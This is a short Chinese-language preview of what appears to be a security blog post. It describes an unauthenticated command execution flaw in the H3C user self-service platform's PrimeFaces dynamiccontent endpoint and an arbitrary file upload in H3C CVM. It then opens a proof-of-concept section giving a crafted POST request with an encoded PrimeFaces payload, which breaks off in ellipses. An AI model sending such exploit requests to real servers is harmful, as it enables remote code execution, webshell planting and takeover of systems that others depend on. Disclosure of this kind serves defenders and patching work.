文章预览
产品介绍 H3C用户自助服务平台是一种基于云计算和自动化技术的管理平台,旨在提供自助式、智能化的网络设备和服务管理解决方案。该平台通过集成多种功能和工具,帮助企业用户更高效地管理和维护其网络设备,并提供更好的用户体验。 漏洞简介 H3C用户自助服务平台 dynamiccontent.properties.xhtml 接口出存在命令执行漏洞,未经身份验证的攻击者可以利用此漏洞执行任意指令,写入后门文件,导致整个web服务器存在被控的风险。 H3C CVM /cas/fileUpload/upload接口存在任意文件上传漏洞,未授权的攻击者可以上传任意文件,获取 webshell,控制服务器权限,读取敏感信息等。 漏洞poc POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1 Host : IP地址:端口 pfdrt =sc =primefaces =uMKljPgnOTVxmOB %2 BH6 %2 FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV %2 FKAe9gtw54DSQCl72JjEAsHTRvxAu
………………………………
